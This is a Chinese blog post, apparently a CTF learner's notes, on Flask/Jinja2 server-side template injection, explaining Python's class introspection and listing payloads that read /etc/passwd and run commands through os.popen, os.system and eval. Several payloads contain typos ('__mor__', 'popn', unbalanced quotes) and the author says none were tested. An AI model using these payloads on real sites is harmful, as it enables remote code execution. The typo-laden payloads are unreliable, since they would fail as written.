2. 程式人生 > >FLASK模板注入 (SSTI)

FLASK模板注入 (SSTI)

阿新 發佈:2018-11-23

最近的幾次比賽裡,發現有幾道涉及SSTI的題目,之前在護網杯的時候其實就已經碰到過了,但是當時並沒有重視,今天才真的去好好了解了SSTI的原理以及利用方法。

首先,SSTI漏洞引發的原因和大多數web漏洞一樣,對使用者輸入的值過於信任,導致使用者輸入一些惡意程式碼來完成攻擊。而最近碰到的幾個SSTI都是基於 FLASK JINJA2模板的注入,FLASK是由python寫的一個基於JINJA2引擎的web應用框架,其實我對這些框架並不瞭解,但瞭解這些漏洞也算是對自己python理解的進一步提升吧。

Python是面向物件的程式語言,所以同樣有著類,物件和繼承屬性。而這種SSTI就充分利用了這些。

Python中有一個 .__class__ 可以獲取例項對應的類,比如一個空字串 "".__class__就可以獲取到 <type'str'> ,那這個字元串同樣也可以換成列表,元組,字典。

接著就是 __mro__這個屬性可以獲取到當前物件的所有繼承類, 這個屬性返回一個tuple物件,這個物件包含了當前類物件所有繼承的基類,tuple中元素的順序就是MRO(Method Resolution Order) 尋找的順序。或者用__base__這個屬性也可以獲取到基本類。

再往後又涉及到類物件中的方法 __subclasses__(),這個方法會返回類中所有存活子類的引用(不是例項),那如果我們用object類呼叫這個方法的話,就可以返回所有的類物件了。(object類物件是所有類的父類)

 

0 <type 'type'>
1 <type 'weakref'>
2 <type 'weakcallableproxy'>
3 <type 'weakproxy'>
4 <type 'int'>
5 <type 'basestring'>
6 <type 'bytearray'>
7 <type 'list'>
8 <type 'NoneType'>
9 <type 'NotImplementedType'>
10 <type 'traceback'>
11 <type 'super'>
12 <type 'xrange'>
13 <type 'dict'>
14 <type 'set'>
15 <type 'slice'>
16 <type 'staticmethod'>
17 <type 'complex'>
18 <type 'float'>
19 <type 'buffer'>
20 <type 'long'>
21 <type 'frozenset'>
22 <type 'property'>
23 <type 'memoryview'>
24 <type 'tuple'>
25 <type 'enumerate'>
26 <type 'reversed'>
27 <type 'code'>
28 <type 'frame'>
29 <type 'builtin_function_or_method'>
30 <type 'instancemethod'>
31 <type 'function'>
32 <type 'classobj'>
33 <type 'dictproxy'>
34 <type 'generator'>
35 <type 'getset_descriptor'>
36 <type 'wrapper_descriptor'>
37 <type 'instance'>
38 <type 'ellipsis'>
39 <type 'member_descriptor'>
40 <type 'file'>
41 <type 'PyCapsule'>
42 <type 'cell'>
43 <type 'callable-iterator'>
44 <type 'iterator'>
45 <type 'sys.long_info'>
46 <type 'sys.float_info'>
47 <type 'EncodingMap'>
48 <type 'fieldnameiterator'>
49 <type 'formatteriterator'>
50 <type 'sys.version_info'>
51 <type 'sys.flags'>
52 <type 'sys.getwindowsversion'>
53 <type 'exceptions.BaseException'>
54 <type 'module'>
55 <type 'imp.NullImporter'>
56 <type 'zipimport.zipimporter'>
57 <type 'nt.stat_result'>
58 <type 'nt.statvfs_result'>
59 <class 'warnings.WarningMessage'>
60 <class 'warnings.catch_warnings'>
61 <class '_weakrefset._IterationGuard'>
62 <class '_weakrefset.WeakSet'>
63 <class '_abcoll.Hashable'>
64 <type 'classmethod'>
65 <class '_abcoll.Iterable'>
66 <class '_abcoll.Sized'>
67 <class '_abcoll.Container'>
68 <class '_abcoll.Callable'>
69 <type 'dict_keys'>
70 <type 'dict_items'>
71 <type 'dict_values'>
72 <class 'site._Printer'>
73 <class 'site._Helper'>
74 <type '_sre.SRE_Pattern'>
75 <type '_sre.SRE_Match'>
76 <type '_sre.SRE_Scanner'>
77 <class 'site.Quitter'>
78 <class 'codecs.IncrementalEncoder'>
79 <class 'codecs.IncrementalDecoder'>
80 <type 'operator.itemgetter'>
81 <type 'operator.attrgetter'>
82 <type 'operator.methodcaller'>
83 <type 'functools.partial'>
84 <type 'MultibyteCodec'>
85 <type 'MultibyteIncrementalEncoder'>
86 <type 'MultibyteIncrementalDecoder'>
87 <type 'MultibyteStreamReader'>
88 <type 'MultibyteStreamWriter'>

由此可以看到object類的第40號元素就是一個有讀檔案功能的類物件。

所以我們就可以用''.__class__.__mor__[2].__subclasses__()[40]('/etc/passwd').read() 讀取/etc/passwd檔案的內容

''.__class__.__mor__[2].__subclasses__()[40]('/tmp').write('test') 在tmp目錄下寫入一個test檔案?應該是吧

 

然後就是更高階的操作,執行系統命令。object.__subclasses__()[59].__init__.func_globals.linecache

查閱的其他資料,訪問os模組都是從warnings.catch_warnings模組入手的,而這兩個模組分別位於元組中的59,60號元素。__init__用於將物件例項化,func_globals可以看該模組下有哪些globals函式,而linecache可用於讀取任意一個檔案的某一行,而這個函式引用了os模組。

  1. object.__subclasses__()[59].__init__.func_globals.linecache.os.popen('id').read()

 

  1. object.__subclasses__()[59].__init__.func_globals['linecache'].os.popen('whoami').read()

 

  1. object.__subclasses__()[59].__init__.func_globals['linecache'].__dict__['o'+'s'].__dict__['sy'+'stem']('ls')

 

object.__subclasses__()[59].__init__.__globals__.__builtins__下有eval,__import__等的全域性函式

  1. object.__subclasses__()[59].__init__.__globals__['__builtins__']['eval']("__import_('os').popen('id').read()")

 

  1. object.__subclasses__()[59].__init__.__globals__.__builtins__.eval("__import__('os).popen('id').read()")

 

  1. object.__subclasses__()[59].__init__.__globals__['__builtins__']['__import__']('os).popen('id').read()

 

  1. object.__subclasses__()[59].__init__.__globals__.__builtins__.__import__('os').popn('id').read()

 

這些payload都可以實現命令執行。

 

因為還沒有找到SSTI的環境,所以還沒有復現,等找到有相關題目的環境就會搭好來複現一遍,對文章進行例項補充的。

 

相關推薦

FLASK模板注入 SSTI

最近的幾次比賽裡,發現有幾道涉及SSTI的題目,之前在護網杯的時候其實就已經碰到過了,但是當時並沒有重視,今天才真的去好好了解了SSTI的原理以及利用方法。 首先,SSTI漏洞引發的原因和大多數web漏洞一樣,對使用者輸入的值過於信任,導致使用者輸入一些惡意程式碼來完成攻擊。而最近碰到的幾個SS

Flask 學習系列---Jinjia2 模板繼承

list size border padding sub -- margin nbsp 中文 1.基模板 <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF

flask web開發 渲染模板與控制結構

# -*- coding: cp936 -*- import os import sys import logging.config import flask import socket from flask import Flask,jsonify from flask import request fro

flask web開發 渲染模板與控制結構 巨集與繼承

渲染模板與控制結構 hello3.py# -*- coding: cp936 -*- import os import sys import logging.config import flask import socket from flask import Flask,jsonify fro

邊做邊學Python Flask Web開發4-- 使用Jinjia2模板

概述 Flask中我們通常使用Jinjia2模板語言來實現複雜的頁面渲染,Jinja2 是一個現代的,設計者友好的,仿照 Django 模板的 Python 模板語言。 它速度快,被廣泛使用,並且提供了可選的沙箱模板執行環境保證安全,它的特性有: 沙箱中執

flask學習筆記:渲染模板和引數

1、渲染模板 需要先匯入render_templatem模組,然後先在檔案所在目錄建立一資料夾,命名為templates,然後在資料夾中新建一個html網頁檔案。(渲染時框架會自動尋找網頁檔案,不必新增"templates"這個路徑,這是由flask框架決定的) &l

Flask原始碼閱讀——渲染模板

1.前面的例子中(第一篇),業務邏輯和表現邏輯混合在了一起,會導致程式碼難以理解和維護。因此, 把表現路基移到模板中能提升程式的可維護性。 例:使用者在網站仲註冊了一個新賬戶。使用者在變淡中輸入嗲子郵箱地址和密碼,然後點選提交按鈕。伺服器收到包含使用者輸入資料

邊做邊學Python Flask Web開發5-- 使用Jinjia2模板

上一篇介紹了Jinjia2模板系統的基本用法,本篇將深入對Jinjia2進行探討,對網頁設計中經常會用到的一些高階特性進行介紹。 模板複用 複用是網頁設計非常常用的特性,比如我們的頁面頭部的網站名稱和頁尾的版權標識通常都是一樣的,我們的選單有時候在每個頁

flask學習筆記:繼承模板和block的使用

繼承的作用就是為了少寫一些重複的程式碼,例如導航欄的實現就需要在模板中定義一個導航欄,其他頁面使用繼承即可: 新建一個base.html,而block main的部分就是導航欄下每個頁面不同的介面,由每個頁面負責實現。 剩下的index和login頁面通過對base的繼承

flask學習筆記--模板中使用url_for

歡迎加入知了課堂,學習flask之前在檢視函式中使用url_for,實現從檢視函式中跳轉到另一個url。現在我為大家演示如何在模板中使用url_for,實現在頁面點選文字,跳轉至另一個頁面。其實很簡單一、方法1.首先通過檢視函式,渲染出一個頁面@app.route('/')d

django模板注入變數傳遞到模板

1.HTML模板如何解析變數? <h1>這是一個html頁面</h1> <p>id:{{ user_id }}</p> <p>名字:{{ username }}</p

模板方法TemplateMethod

eth ava out 行為 pla emp line tty span 抽象類體現的就是一種模板模式的設計,抽象類作為多個子類的通用模板,子類在抽象類的基礎上進行擴展、改造,但子類總體上會保留抽象類的行為方式。解決的問題1.當功能內部一部分實現是確定的,一部分實現是不確定

【轉載】設計模式_模板方法學習

res bootstrap 重載方法 dex col 算法實現 選擇性 parent abstract 模板方法模式,一般是為了統一子類的算法實現步驟,所使用的一種手段或者說是方式。它在父類中定義一系列算法的步驟,而將具體的實現都推遲到子類。 通常情況下,模板方法模式用

我最喜歡的模板jadepug學習和使用

font lock erro des 個性 ted -o org index 由於版權問題,現已改名pug.但無須擔心,幾乎沒什麽區別.就算依然使用jade也不會有太大影響. 慢慢遷移過渡即可 # 官網 https://pugjs.org # github https:

匈牙利算法&模板Omn

nbsp def %d == div ret class push_back zhong #include<bits/stdc++.h> #define maxn 100000 using namespace std; vector <int> s

Flask 學習系列---Jinjia2使用過濾器

ide 數位 指定字段 模板 小數 else capital 12px 效果圖 再Jinjia2中過濾器是一種轉變變量輸出內容的技術。··過濾器通過管道符號“|與變量鏈接,並且可以通過圓括號傳遞參數” 。舉例說明: {{my_variable|default(‘my_var

python--Django之模板template

cat spa 後臺 數據 htm title 開始 temp document 1.模板層的功能 為了更有邏輯的將數據庫中的數據渲染到模板中。 2.模板語法: {{var_name}} #渲染變量用的 {% url %} #渲染標簽用的 3.變量

python-接口開發flask模塊工具類準備

update date lose code def let mit pip clas 我們常常聽說測試http接口、測試java接口,測試socket接口等等;那麽python這麽強大的語言當然也可以用來開發接口了。 flask模塊介紹: python中用來開發接口的模塊:

flask-信號blinker

functions blog from del 添加 var don mutable nbsp Flask框架中的信號基於blinker,其主要就是讓開發者可是在flask請求過程中定制一些用戶行為。 ? 1 pip3 in

徒手擼出一個類Flask微框架路由及路由註冊的演變

pass nac 等價 themes 字典 lac found round wap 路由的基本概念:根據不同的訪問路徑調用不同的方法或者類from webob import Response,Request,dec from wsgiref.simple_server im